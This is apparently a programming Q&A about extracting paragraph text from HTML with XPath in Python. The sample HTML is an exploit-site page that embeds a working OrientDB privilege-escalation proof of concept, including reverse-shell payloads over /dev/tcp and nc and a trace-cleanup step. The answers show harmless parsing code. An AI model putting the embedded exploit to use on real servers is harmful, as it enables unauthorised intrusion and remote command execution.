How can I use XPath in Python to extract specific content from the HTML in this question?

Problem description and background
<html>
    <head>
        <meta charset="UTF-8"/>
        <title>OrientDB &lt;=2.22 先锋世道</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
        <meta name="viewport"
              content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"/>
        <link rel="shortcut icon" href="http://0day5.com/usr/themes/DUX/img/favicon.ico"/>
        <meta http-equiv="Cache-Control" content="no-siteapp"/>
        <meta http-equiv="Cache-Control" content="no-transform"/>

        <link rel="stylesheet" href="//cdn.jsdelivr.net/bootstrap/3.2.0/css/bootstrap.min.css" type="text/css"
              media="all"/>
        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" type="text/css"
              media="all"/>

        <style>
        </style>

        <script type="text/javascript" src="//cdn.jsdelivr.net/jquery/1.9.1/jquery.min.js"/>
        <!--加载进度条-->
        <link href="//cdn.jsdelivr.net/pace/1.0.2/themes/orange/pace-theme-flash.css" rel="stylesheet"/>
        <script>paceOptions = { elements: {selectors: ['#footer']}};</script>
        <script src="//cdn.jsdelivr.net/pace/1.0.2/pace.min.js"/>
        <!--[if lt IE 9]><script src="//cdn.jsdelivr.net/html5shiv/3.7.3/html5shiv.min.js"></script><![endif]-->

        <meta name="description"
              content="关于OrientDBOrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。Vulnerability Det..."/>
        <meta name="keywords" content="OrientDB"/>
        <script type="text/javascript">
            (function () {
            var event = document.addEventListener ? {
            add: 'addEventListener',
            triggers: ['scroll', 'mousemove', 'keyup', 'touchstart'],
            load: 'DOMContentLoaded'
            } : {
            add: 'attachEvent',
            triggers: ['onfocus', 'onmousemove', 'onkeyup', 'ontouchstart'],
            load: 'onload'
            }, added = false;

            document[event.add](event.load, function () {
            var r = document.getElementById('respond-post-4424'),
            input = document.createElement('input');
            input.type = 'hidden';
            input.name = '_';
            input.value = (function () {
            var _2lc = 'f20'//'Rws'
            +//'3'
            '3'+//'i'
            'da3'+//'huy'
            '371'+//'0yg'
            'dbf'+'qb'//'qb'
            +//'Ak2'
            'df'+/* 'r'//'r' */''+'7'//'bm9'
            +//'tuH'
            'c4'+'7'//'5'
            +'d'//'FCP'
            +'052'//'nG4'
            +'eb6'//'umS'
            +'7'//'Ray'
            +//'TV9'
            '1'+'331'//'L'
            +//'O'
            'b9', _82D = [[3,4],[12,14]];

            for (var i = 0; i &lt; _82D.length; i ++) {
            _2lc = _2lc.substring(0, _82D[i][0]) + _2lc.substring(_82D[i][1]);
            }

            return _2lc;
            })();

            if (null != r) {
            var forms = r.getElementsByTagName('form');
            if (forms.length &gt; 0) {
            function append() {
            if (!added) {
            forms[0].appendChild(input);
            added = true;
            }
            }

            for (var i = 0; i &lt; event.triggers.length; i ++) {
            var trigger = event.triggers[i];
            document[event.add](trigger, append);
            window[event.add](trigger, append);
            }
            }
            }
            });
            })();
        </script>
    </head>

    <body class="single">
        <div class="site-search">
            <div class="container">
                <form method="get" class="site-search-form">
                    <input class="search-input" name="s" type="text" placeholder="输入关键字" value=""/>
                    <button class="search-btn" type="submit">
                        <i class="fa fa-search"/>
                    </button>
                </form>
            </div>
        </div>
        <!--header-->
        <section class="container">
            <div class="content-wrap">
                <div class="content">
                    <header class="article-header">
                        <h1 class="article-title">
                            <a>OrientDB &lt;=2.22 代码执行</a>
                        </h1>
                        <div class="article-meta">
                            <span class="item">2017-07-15</span>
                            <span class="item">分类:<a>Windows</a> /
                                <a>Linux/Unix</a>
                            </span>
                            <span class="item post-views">阅读(64516)</span>
                            <span class="item">评论(0)</span>
                        </div>
                    </header>
                    <article class="article-content">
                        <p>
                            <strong>关于OrientDB</strong>
                        </p>
                        <p>OrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。</p>
                        <p>
                            <strong>Vulnerability Details</strong>
                            <br/>OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles
                            –<strong>admin</strong>, <strong>writer</strong> and <strong>reader</strong>. These have
                            their usernames same as the role. For each database created on the server, it assigns by
                            default these 3 users.
                        </p>
                        <p>The privileges of the users are:</p>
                        <p>
                            <strong>admin</strong>
                            – access to all functions on the database without any limitation
                            <br/>
                            <strong>reader</strong>
                            – read-only user. The reader can query any records in the database, but can’t modify or
                            delete them. It has no access to internal information, such as the users and roles
                            themselves
                            <br/>
                            <strong>writer</strong>
                            – same as the "reader", but it can also create, update and delete records<br/>ORole​
                            structure handles users and their roles and is only accessible by the admin user. OrientDB
                            requires oRole read permissions to allow the user to display the permissions of users and
                            make other queries associated with oRole permissions.
                        </p>
                        <p>From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order
                            by statements​, this permission requirement is not required and information is returned to
                            unprivileged users.
                        </p>
                        <p>Since we enable the functions <code>where</code>, <code>fetchplan</code> and <code>order
                            by</code>, and OrientDB has a function where you could execute groovy functions and this <code>
                            groovy
                        </code> wrapper doesn’t have a sandbox and exposes system functionalities, we can run any
                            command we want.
                        </p>
                        <h3>poc</h3>
                        <pre>
                            <code class="lang-python">#! /usr/bin/env python
                                #-*- coding: utf-8 -*-
                                import sys
                                import requests
                                import json
                                import string
                                import random

                                target = sys.argv[1]

                                try:
                                port = sys.argv[2] if sys.argv[2] else 2480
                                except:
                                port = 2480

                                url =
                                "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)


                                def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):
                                return ''.join(random.choice(chars) for _ in range(size))

                                def enum_databases(target,port="2480"):

                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:
                                #print "[+] Database Enumeration successful"
                                database = req.json()['databases']

                                return database

                                return False

                                def check_version(target,port="2480"):
                                base_url = "http://%s:%s/listDatabases"%(target,port)
                                req = requests.get(base_url)

                                if req.status_code == 200:

                                headers = req.headers['server']
                                #print headers
                                if "2.2" in headers or "3." in headers:
                                return True

                                return False

                                def run_queries(permission,db,content=""):

                                databases = enum_databases(target)

                                url =
                                "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])

                                priv_enable = ["create","read","update","execute","delete"]
                                #query = "GRANT create ON database.class.ouser TO writer"

                                for priv in priv_enable:

                                if permission == "GRANT":
                                query = "GRANT %s ON %s TO writer"%(priv,db)
                                else:
                                query = "REVOKE %s ON %s FROM writer"%(priv,db)
                                req = requests.post(url,data=query,auth=('writer','writer'))
                                if req.status_code == 200:
                                pass
                                else:
                                if priv == "execute":
                                return True
                                return False

                                print "[+] %s"%(content)
                                return True

                                def priv_escalation(target,port="2480"):

                                print "[+] Checking OrientDB Database version is greater than 2.2"

                                if check_version(target,port):

                                priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking
                                enabling operations on database.function")
                                priv2 = run_queries("GRANT","database.function","Enabled functional operations on
                                database.function")
                                priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system
                                clusters")

                                if priv1 and priv2 and priv3:
                                return True

                                return False

                                def exploit(target,port="2480"):

                                #query =
                                '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/0.0.0.0/8081 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute(); ","parameters":null'

                                #query =
                                {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def
                                command = 'whoami';File file = new File(\"hello.sh\");file.delete();file &lt;&lt;
                                (\"#!/bin/bash\\n\");file &lt;&lt; (command);def proc = \"bash hello.sh\".execute();
                                ","parameters":None}

                                func_name = random_function_name()

                                print func_name

                                databases = enum_databases(target)

                                reverse_ip = raw_input('Enter the ip to connect back: ')

                                query =
                                '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/'+reverse_ip+'/8081 0&gt;&amp;1\';File file = new
                                File(\\"hello.sh\\");file.delete();file &lt;&lt; (\\"#!/bin/bash\\\\n\\");file &lt;&lt;
                                (command);def proc = \\"bash hello.sh\\".execute();","parameters":null}'
                                #query =
                                '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def
                                command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081
                                &gt;/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a file.delete() \u000a file
                                &lt;&lt; (\"#!/bin/bash\")\u000a file &lt;&lt; (command)\n def proc = \"bash
                                hello.sh\".execute() ","parameters":null}'
                                #query =
                                {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def
                                command = \'bash -i &gt;&amp; /dev/tcp/0.0.0.0/8081 0&gt;&amp;1\';File file = new
                                File(\"hello.sh\");file.delete();file &lt;&lt; (\"#!/bin/bash\\n\");file &lt;&lt;
                                (command);def proc = \"bash hello.sh\".execute();","parameters":None}
                                req =
                                requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))

                                if req.status_code == 201:

                                #print req.status_code
                                #print req.json()

                                func_id = req.json()['@rid'].strip("#")
                                #print func_id

                                print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)

                                req =
                                requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
                                #print req.status_code
                                #print req.text

                                if req.status_code == 200:
                                print "[+] Open netcat at port 8081.."
                                else:
                                print "[+] Exploitation failed at last step, try running the script again."
                                print req.status_code
                                print req.text

                                #print "[+] Deleting traces.."

                                req =
                                requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
                                priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
                                priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
                                priv3 = run_queries("REVOKE","database.systemclusters","Cleaning
                                Up..database.systemclusters")

                                #print req.status_code
                                #print req.text

                                def main():

                                target = sys.argv[1]
                                #port = sys.argv[1] if sys.argv[1] else 2480
                                try:
                                port = sys.argv[2] if sys.argv[2] else 2480
                                #print port
                                except:
                                port = 2480
                                if priv_escalation(target,port):
                                exploit(target,port)
                                else:
                                print "[+] Target not vulnerable"

                                main()
                            </code>
                        </pre>
                    </article>

                    <div class="article-tags">标签:
                        <a>OrientDB &lt;=2.22 代码执行</a>

                        <a>OrientDB</a>
                    </div>

                    <div class="title" id="comments">
                        <h3>评论
                            <small/>
                        </h3>
                    </div>
                </div>
            </div>
            <!-- start sidebar -->
            <!-- end sidebar -->
        </section>


        <!--footer-->

        <footer id="footer" class="footer">

            <div class="container">
                时代先锋@2000-2022

                <div class="hide"/>

            </div>

        </footer>

        <script src="//cdn.jsdelivr.net/highlight.js/9.11.0/highlight.min.js"/>

        <script>

            window.jsui={

            www: 'http://0day5.com/',

            uri: 'http://0day5.com/usr/themes/DUX',

            ver: '1.0',

            roll: ["1",],

            ajaxpager: '0'

            };

        </script>

        <script type="text/javascript" src="//cdn.jsdelivr.net/bootstrap/3.2.0/js/bootstrap.min.js"/>

        <!-- Analytics code -->


    </body>

</html>
Desired result
关于OrientDB

OrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。

Vulnerability Details
OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles – admin, writer and reader. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.

The privileges of the users are:

admin – access to all functions on the database without any limitation
reader – read-only user. The reader can query any records in the database, but can’t modify or delete them. It has no access to internal information, such as the users and roles themselves
writer – same as the "reader", but it can also create, update and delete records
ORole​ structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.

From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements​, this permission requirement is not required and information is returned to unprivileged users.

Since we enable the functions where, fetchplan and order by, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesn’t have a sandbox and exposes system functionalities, we can run any command we want.

Do you want the text of every tag?
Try this:


xpath('//*/text()')

This XPath should do what you need: //article//p//text()
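
To make the difference between the two suggestions concrete: `//*/text()` returns every text node in the page, including the contents of the `<script>` blocks and the `<pre>` code listing, whereas restricting the path to `<p>` elements under `<article>` yields only the prose shown in the desired result. Below is a minimal sketch of that idea. It rests on several assumptions: it uses the standard library's `xml.etree.ElementTree` (which supports only a subset of XPath, so `itertext()` stands in for `text()`), it assumes the page is well-formed XML as the pasted sample appears to be, and `SAMPLE` and `paragraph_texts` are illustrative names, not part of the original page. With a full XPath engine such as lxml, the expression `//article//p//text()` from the answer above could be used directly.

```python
import xml.etree.ElementTree as ET

# Shortened, hypothetical stand-in for the page in the question.
SAMPLE = """<html><body>
<article class="article-content">
<p><strong>Vulnerability Details</strong>
<br/>OrientDB uses RBAC model
for authentication schemes.</p>
<p>The privileges of the users are:</p>
<h3>poc</h3>
<pre><code>import sys</code></pre>
</article>
</body></html>"""

# Sentinel used to remember where <br/> elements were, so that only
# real line breaks survive whitespace normalisation.
BR_MARK = "\x00"


def paragraph_texts(markup):
    """Return the text of every <p> under <article>, one string per paragraph."""
    root = ET.fromstring(markup)
    paragraphs = []
    # ElementTree's limited XPath: all <p> descendants of any <article>.
    for p in root.findall(".//article//p"):
        # Mark each <br/> so it can become a newline later.
        for br in p.iter("br"):
            br.tail = BR_MARK + (br.tail or "")
        raw = "".join(p.itertext())
        # Collapse source-code line wrapping inside each visual line.
        lines = [" ".join(part.split()) for part in raw.split(BR_MARK)]
        text = "\n".join(line for line in lines if line)
        if text:
            paragraphs.append(text)
    return paragraphs


if __name__ == "__main__":
    for text in paragraph_texts(SAMPLE):
        print(text)
        print()
```

Because the `<h3>` and `<pre>` elements are siblings of the paragraphs rather than descendants of them, the code listing is skipped without any extra filtering.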